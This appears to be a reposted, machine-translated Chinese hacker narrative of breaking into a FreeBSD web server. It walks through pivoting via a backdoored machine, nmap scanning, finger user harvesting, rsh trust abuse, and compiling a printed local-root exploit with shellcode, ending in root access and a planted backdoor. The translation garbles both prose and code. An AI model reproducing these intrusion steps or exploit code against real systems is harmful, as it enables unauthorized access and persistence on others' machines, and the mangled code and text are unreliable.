Intrusion process

zhaozj2021-02-11  232

The purpose of this article is just to give some careless network managers a warning -Internet is fun but very fragile. When your computer provides information and service on the Internet, it will attract information and service. Symption of "curios". And the security and convenience is a pair of contradictions ... After you do a security strategy for your own network, you should make sure you are willing to use some convenient services with how much risks, of course these services - such as Rlogin, May only make you enter a password less ... first is to determine the goal - hit the big chaos to pick one, try able to success ... Oh, so on Yahoo, TAIWAN's site is small ... This is not bad, let's call it www.targe.com ... or first ping look at the situation - don't touch the wall is inferior ... C: /> ping

http://www.targe.com/

Pinging

http://www.targe.com/

[111.111.111.111] with 32 bytes of data: Reply from 111.111.111.111: bytes = 32 time = 621ms TTL = 241 Reply from 111.111.111.111: bytes = 32 time = 620ms TTL = 241 Reply from 111.111.111.111: bytes = 32 Time = 611ms TTL = 241 reply from 111.111.111.111: BYTES = 32 TIME = 591ms TTL = 241 speed still is still very fast ... then start ... first boarding a model of the machine in Taiwan - so safe, Will n't leave your own ip ... (of course, saying out the question - so "To trace it is not very difficult, I have said that a friend said, some universities in the south have been black, and the signs have indicated hackers from The discourse left by the United States, IP, changed the homepage ... Friends are traveled to make up the search, and found that IP is a service provider with free shell service in the United States ... so I applied for a shell, becomes root through a series of movements. System Log - Truth White, IP actually points to Na University itself). There is also a benefit through the springboard - if your attempt fails, the IP of Taiwan is left in the system log, such a login failed command does not cause the system administrator to pay attention ... C: /> nc ** **. *** 12345, I boarded the board, I reserved a Suid shell in the 12345 port ... well, sacrificed the sword - nmap ... # ./nmap -st -O 111.111.111.111 Starting nmap v. 2.3beta12 by fyodor (fyodor@dhp.com,

http://www.insecure.org/nmap/)

Interesting Ports on

http://www.targe.com/

(111.111.111.111): Port State Protocol Service 7 open tcp echo 9 open tcp discard 19 open tcp chargen 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 37 open tcp time 79 open tcp finger 80 open tcp http 111 open tcp sunrpc 443 open tcp https 512 open tcp exec 513 open tcp login 514 open tcp shell 515 open tcp printer 540 open tcp uucp 3306 open tcp mysql TCP Sequence Prediction: Class = random positive increments Difficulty = 55346 (Worthy challenge) No OS matches for host ( If you know what OS is running on it ...................... nmap Run Completed - 1 IP address (1 host up) scanned in 17 seconds 唔, luck is not bad, provide a lot of services, estimated leaks I don't want to go ... I just didn't judge the system type, which looks like: Port State Protocol Service 21 Open TCP FTP 25 Open TCP SMTP 79 Open TCP Finger 80 OpenRPC 512 OPEN TCP Exec 513 Open TCP Login 514 Open TCP Shell 540 Open TCP UUCP 3306 Open TCP mysql Recent RPC attack is very popular, I am afraid that it is convenient to be easy - as long as there is a vulnerability, the remote can get a rootshell ... or even the computer is completely I can easily implement it easily, huh, let's take a look at this 111 port's sunrpc. What is the mystery ... # rpcinfo -p 111.111.111.111 & 21404 # Program Vers Proto Port Service 100000 2 TCP 111 RPCBind 100000 2 UDP 111 rpcbind 咦I may have a remote overflowing vulnerability # ./nc 111.111.111.111 21 # 龙 的 东, what output is not closed, how is this? C: /> ftp 111.111.111.111 Connected to 111.111.111.111. Connection Closed by Remote Host. Oh, it seems that it is filtered out ... What should I do? Look at the 25-port is what SMTP service is run ... # ./nc 111.111.111.111 25 220 *** - *** - *** - *** ESMTP Sendmail 8.9.3 / 8.9.3; WED, 5 APR 2000 08:56:59 GMT Sendmail 8.9.3 / 8.9.3? It seems that there is no deadly vulnerability ... see what web server first ... # (echo "head / http/1.0"; echo; echo )|./nc -w 3 111.111.111 80

- // Ietf // DTD HTML 2.0 // en "> 501 method not userned </ title> </ head> <body> <h1> method not userned </ h1> head to /Http/1.0 not supported. <p> invalid method in request head / http/1.0 <p> <hr> <address> apache / 1.3.9 server at *** - *** - *** - *** Port 80 </ address> </ body> </ html> Apache's version of the "dead hole" in the "dead hole" in the East East ... I have opened the finger, and I will take the list of users first. Come out ... Finger o@www.targe.com [www.targe.com.tw] root aaa bb ccc DDD finally harvest ... What should I do next? Since this host opened 512, 513, 514 R series service, it is worth trying to try it, say that the lazy guy has set it directly in .Rhosts Username, I'm cool ... I wrote a shell script, let it go to one place to try RSH commands Transfer to broiler # chmod 700 rsh.sh # nohup ./rsh.shhttp://www.targe.com/</p> <p>It automatically adds the username of the Finger in / etc / passwd and / etc / shadow, then SU, then execute the RSH command for remote destination 111.111.111.111, returns to the username ... and then the backup passwd And Shadow is copied back ... Delete the temporary file, generate report files ... (maybe I have a problem with.rhosts, sometimes I add but RCP, I will also report Permission Denied or Connect REFUSED, so I will report. Simple SU is a user - maybe it is too stupid;) I will go to MUD in my prawn ... half an hour later back to the broiler, read the report file .rsh.txt # cat ./.rsh. TXT CCC HEHE, I am very sorry, it seems to get a shell ... go in and see ... # rlogin -l ccc 111.111.111.111 Last login: fri mar 24 19:04:50 from 202.102.2.147 CopyRight (C) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California. All Rights Reserved. Freebsd 3.2-Release (Generic) # 0: Tue May 18 04:05:08 GMT 1999 You have mail... It turned out to be freebsd 3.2-release, it feels good, come in, see how my permissions ...> ID ID UID = 1003 (CCC) GID = 1003 (CCC) Groups = 1003 (CCC) It seems to do It is quite limited ... and then look at there is anything else in the system ...> WW 9:03 PM Up 6 Days, 2:37, 3 Uses, Load Averages: 0.00, 0.01, 0.00 user Tty from login @ idle What CCC P0 **. **. ***. *** 6:04 PM 2:41 -tcsh (tcsh) is good, I am free ... Take a look at the passwd ...> CAT / etc / passwd cat / etc / passwd Root: *: 0: 0: Charlie &: / root: / usr / local / bin / bash aaa: *: 1005: 2000 :: / Home / WWW: / usr / local / bin / tcsh bb: *: 1006: 1006 :: / home / bb: / usr / local / bin / tcsh ccc: *: 1003: 1003: : / home / ccc: / usr / local / bin / tcsh ddd: *: 1008: 1008: DDD: / home / www: / usr / local / bin / tcsh eee: *: 1009: 1009: EEE: / HOME / Eee: / usr / local / bin / tcsh is very obvious / home / www is the main directory of the WWW user ... first look at the CCC has no write access to this directory> Echo test> / home / www / test test: permission It seems that if you want to change his homepage, you have to find another way ... but already have a user shell, the highest authority is only one step, okay, how is it in the database about FreeBSD 3.2 record, it seems that there are not many things ... and some are still the risk after installing foreign packages ... first look at the privileges, otherwise you have to find a BSD to compile ......> Ls / usr / local / bin | GREP GCC GCC generally installing GCC is in this directory, otherwise it is best to compare insurance.</p> <p>This is convenient ... you can pick up the code directly ... I tried it several times I found this: / * by Nergal * / #include <errno.h> #include <signal.h> #include <stdio.. H> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <signal.h> #include <sys / wait.h> char shellcode [] = "/ XEB / X0A / X62 / X79 / X20 / X4E / X65 / X72 / X20" "" / XEB / X23 / X5E / X8D / X1E / X89 / XD2 / X0B / X31 / XD2 / X89 / X56 / X07 / X89 / X56 / X0F "/ x89 / x56 / x14 / x88 / x56 / x19 / x31 / xca / x52" "/ x51 / x53 / X50 / XEB / X18 / XE8 / XD8 / XFF / X01 / X01 / X01 / X01 "" / x02 / x02 / x03 / x03 / x03 / x9a / x04 / x04 / x04 / x04 / x07 / x04 / x00 "; #define passwd" ./passwd "Void SG (INT X) {} int main (int Argc, char ** argv) {unsigned int stack, shaddr; int pid , CHAR BUFF [40]; Unsigned int stat; char name [4096]; char SC [4096]; char SIGNATURE [] = "SIGNATURE"; SIGNAL (SIGUSR1, SG); IF Symlink ("Usr / Bin / Passwd", Passwd && errno! = eexist) {Perror ("CREANED SYMLINK:"); exit (1);} shaddr = (unsigned int) & shaddr; stack = shaddr-2048; if ( Argc> 1) Shaddr = At OI (Argv [1]); if (Argc> 2) Stack = ATOI (Argv [2]); FPRINTF (stderr, "shellcode addr = 0x% x stack = 0x% x / n", shaddr, stack; fprintf (Stderr, "Wait for /" Press Return / "Prompt: / N"); MEMSET (SC, 0x90, SIZEOF (SC)); STRNCPY (SC SIZEOF (SC) -Strlen (Shellcode) -1, Shellcode, Strlen (SHELLCODE)); STRNCPY (SC, "EGG =", 4); MEMSET (Name, 'X', SIZEOF (Name)); for (PTR = Name; PTR <Name SizeOf (Name); PTR = 4 ) * (unsigned int *) PTR = shaddr; Name [sizeof (name) - 1] = 0; pid = fork ();</p> <p>Switch (PID) {case -1: perror ("fork"); exit (1); case 0: pid = getppid (); sprintf (buff, "/ proc /% d / MEM", PID); fd = Open (BUFF, O_RDWR); if (FD <0) {Perror ("open procmem"); Wait (NULL); exit (1);} / * Wait for child to Execute Suid Program * / Kill (PIGUSR1); Do {Lseek (FD, (unsigned int) signature, seek_set);} while (READ (FD, BUFF, SIGNEOF (SIGNATURE)) == SizeOf (SIGNATURE) &&! Strncmp (Buff, Signature, Sizeof (Signature))); Lseek (FD, STACK, SEEK_SET); SWITCH (Schild = fork ()) {case -1: perror ("fork2"); exit (1); case 0: DUP2 (FD, 2); SLEEP (2); EXECL (Passwd, Name, "Blahblah", 0); Printf ("EXECL FAILED / N"); Exit (1); Default: Waitpid (Schild, & status, 0);} fprintf (stderr, "/ npress return./n "); exit (1); default: / * Give Parent Time to open / proc / pid / mem * / pause (); Putenv (SC); Execl (Passwd," Passwd ", null; PERROR (" Execl " ); EXIT (0);}} I said this vulnerability: As early as 1997, I found a fatal vulnerability in * BSD. It can cause local users to capture root privileges, * BSD core is simple. Patch, but unfortunately, when we can still capture root privileges through the operation of / proc / pid / mem ... Unted, in the default freebsd3.3 is mounted.</p> <p>Let's take a look at the situation on this machine, don't be white ... # / sbin / mount / dev / wd0s1a on / (local, WRITES: SYNC 12 async 134) / dev / wd0s1h on / home (local , WRITES: SYNC 2 Async 120) / DEV / WD0S1F ON / USR (Local, Writes: Sync 2 Async 93) / DEV / WD0S1G ON / USR / LOCAL (local, Writes: sync 2 async 16) / dev / wd0s1e ON / VAR (local, Writes: sync 118 async 498) Procfs on / proc (local) Oh, see if there is any procfs ON word? It seems that God is helping ... a non-privileged process A self-calling sub-process B, a open / proc / pid-of-b / MEM, B execute a setuid binary, now B and A of the EUID have been different However, A still controls the B process by the descriptor of / proc / pid-of-b / MEM, you may do a lot of things ... in Order to Stop this Exploit, An Additional Check Was Added to the Code Responsible for I / O on file descriptors referring to procfs pseudofiles In miscfs / procfs / procfs.h (from FreeBSD 3.0) we read:. / * * Check to see whether access to target process is allowed * evaluates to 1 if access is allowed * / #define. Checkio (P1, P2) / (((p1) -> p_cred-> pc_ucred-> cr_uid == (p2) -> p_cred-> p_ruid) && / ((p1) -> p_cred-> p_ruid == (P2 ) -> p_cred-> p_ruid) && / ((p1) -> p_cred-> p_svuid == (p2) -> p_cred-> p_ruid) && / ((p2) -> p_flag & p_sugid) == 0) || / (SUSER ((p1) -> p_cred-> p_ucred, & (p1) -> p_acflag) == 0) AS We See, Process Performing I / O (P1) Must Have The Same Uids As Target Process (P2) , unless fruit, the above check will not prevent x from Writing. AS Some of Readers Certainly Already Have Guessed, F '</p> <p>s number will be 2, stderr fileno ... We can pass to a setuid program an appropriately lseeked file descriptor no 2 (pointing to some / proc / pid / mem), and this program will blindly write there error messages. Such output is often partially controllable (eg contains program's name), so we can write almost arbitrary data onto other setuid program's memory This scenario looks similar to close (fileno (stderr));. execl ( "setuid-program", ...) exploits, . but in fact differs profoundly exploits the fact that the properties of a fd pointing into procfs is not determined fully by "open" syscall (all other fd are; skipping issues related to securelevels). These properties can change because of priviledged code execution As a result, (Priviled) Children Of Some Process P Can Inherit A fd Opened Read-Write, Though P CAN't Directly Gain Such Fd Via Open Syscall. Surrounding it into Chinese ... I am interested in seeing, Skip it is not interested ... well, then use the loopholes to use the program RCP.> RCP root @ ***. ***. ***. **: / tmp / pcnfs.c / tmp / where ** **. ***. ***. ** is an inclined egg, and a guy who has been added ... compile Line - may have some small changes to the program ...> gcc pcnfs.c -op> ./ p -4000 -10000 shellcode addr = 0xBFBFCD4C stack = 0xBFBFADDC WAIT for "Press Return" Prompt: New Password: Press Return . ID UID = 1003 (CCC) GID = 1003 (CCC) EUID = 0 Groups = 1003 (CCC) WOWOWO! I am root ... haha, that is, I can now do whatever you want to ... ... Try again / home / www directory has no write permission ... echo test> /Home/www/test.txt;ls / home / www | grep test test.txt Oh, ok, big success ... General situation After doing this step, you will have a desire to modify the homepage will dissipate. After all, we are not a person who is a happy system. We just hope that the online society is healthier, so - I didn't change anything, just stayed. The latter door is BYE-BYE ... We have too many systems available for learning, I have to read more about these remote machines - so, keep a back door or necessary. Of course, it is still a good thing to work, etc. After all things OK will leave.</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-5833.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="5833" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.051</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'kbpPCPEcUDlYINj_2BudSJxB6DzDt9DdOIXQEOm3wZHNdy6_2BXrCn95s6JStGQGunwoDnzyRPSGTvo4Z0dvi2nS9Q_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>